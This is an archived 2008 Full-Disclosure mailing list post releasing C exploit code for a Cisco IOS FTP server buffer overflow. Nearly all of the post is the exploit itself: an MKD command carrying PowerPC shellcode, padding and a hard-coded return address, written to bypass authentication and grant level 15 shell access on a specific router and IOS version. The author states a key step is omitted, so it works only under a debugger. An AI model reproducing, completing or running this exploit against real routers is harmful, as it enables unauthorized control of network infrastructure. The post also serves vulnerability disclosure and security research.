lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 29 Jul 2008 10:37:01 +0100
From: "Andy Davis" <iosftpexploit@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Remote Cisco IOS FTP server exploit

Hi,

The IOS FTP server vulnerabilities were published in an advisory by Cisco in
May 2007. The FTP server does not run by default, it is not widely used and
has since been removed from new versions of IOS. Therefore, I took the
decision to release this exploit code in order to show that IOS can be
reliably exploited to provide remote level 15 exec shell access. This
clearly demonstrates that patching your router is just as important as
patching your servers.

To prevent its widespread abuse I have omitted a critical step which means
that it will only work when the router is connected to a debugger - not
something you are likely to encounter on the Internet

Anyway, hopefully this will promote further IOS security research as there's
plenty left to look at!

Cheers,

Andy



/*

Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research

iosftpexploit <at> googlemail 'dot' com

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists